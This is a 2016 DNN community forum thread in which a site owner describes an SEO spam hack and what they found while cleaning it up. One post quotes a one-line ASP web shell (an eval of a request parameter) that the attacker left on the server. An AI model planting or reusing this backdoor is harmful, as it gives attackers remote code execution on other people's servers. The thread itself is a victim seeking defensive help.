Products

Solutions

Resources

Partners

Community

Blog

About

QA

Ideas Test

New Community Website

Ordinarily, you'd be at the right spot, but we've recently launched a brand new community website... For the community, by the community.

Yay... Take Me to the Community!

Welcome to the DNN Community Forums, your preferred source of online community support for all things related to DNN.
In order to participate you must be a registered DNNizen

HomeHomeOur CommunityOur CommunityGeneral Discuss...General Discuss...Spam Content HackSpam Content Hack
Previous
 
Next
New Post
5/13/2016 3:11 AM
 

Hi,

My web site (V7.3.3) has been spam hacked. There is one page that display completely different content for search engine (confirmed with fetch feature from Google Webmaster tool).

But I have no clue where I need to search to remove this unwanted content, I can't find any hidden code in module content, module setting, skin files, etc...

Is anyone have a clue where I should search for the pirate code ?

The spam hack is about "Cheap Jersey Wholesale" .

Thanks.

 
New Post
5/13/2016 3:59 AM
 
Restore it from a pre-damaged backup.

You'll need to close off the entry route - or it will happen again.

Best wishes,
- Richard
Agile Development Consultant, Practitioner, and Trainer
www.dynamisys.co.uk
 
New Post
5/13/2016 8:12 AM
 
please check as well the file system - the hackers might have uploaded a new default.aspx file

Cheers from Germany,
Sebastian Leupold

dnnWerk - The DotNetNuke Experts   German Spoken DotNetNuke User Group

Speed up your DNN Websites with TurboDNN
 
New Post
5/15/2016 9:02 PM
 

Unfortunately I cannot go back to a previous state of my instance, too much content updated on some other web sites of the instance.

Anyway, I found a bot.php file in the root  repository. This file seems to generate php file in a "temp" directory. The hack just create dedicated content for the search engine robot. In the "temp"This php file are named like this "0dc382c2459fcbef61865edc8d4971f1", with no extension and have php and html code (for Search Engine robot). They are generated at least 10 time per day.

For 1 of my instances, I removed the bot.php file from my instance, but file a file asp is still created with this content : (__what_the_fuck_<%response.write(now):eval request("-1007190869")%>)

 I also found in the "images" directory, 3 files, index.php, web.config and html_temp.txt.

I will remove them and see what happened.

What I need to check and change to avoid people can't upload files on my file system?

Thanks.

 
New Post
5/15/2016 9:27 PM
 

And the main web.config file has been updated the same date as the bot.php file has been created.

For now I can't figure out, what was changed.

 
Previous
 
Next
HomeHomeOur CommunityOur CommunityGeneral Discuss...General Discuss...Spam Content HackSpam Content Hack


These Forums are dedicated to discussion of DNN Platform and Evoq Solutions.

For the benefit of the community and to protect the integrity of the ecosystem, please observe the following posting guidelines:

  1. No Advertising. This includes promotion of commercial and non-commercial products or services which are not directly related to DNN.
  2. No vendor trolling / poaching. If someone posts about a vendor issue, allow the vendor or other customers to respond. Any post that looks like trolling / poaching will be removed.
  3. Discussion or promotion of DNN Platform product releases under a different brand name are strictly prohibited.
  4. No Flaming or Trolling.
  5. No Profanity, Racism, or Prejudice.
  6. Site Moderators have the final word on approving / removing a thread or post or comment.
  7. English language posting only, please.
What is Liquid Content?
Find Out
What is Liquid Content?
Find Out
What is Liquid Content?
Find Out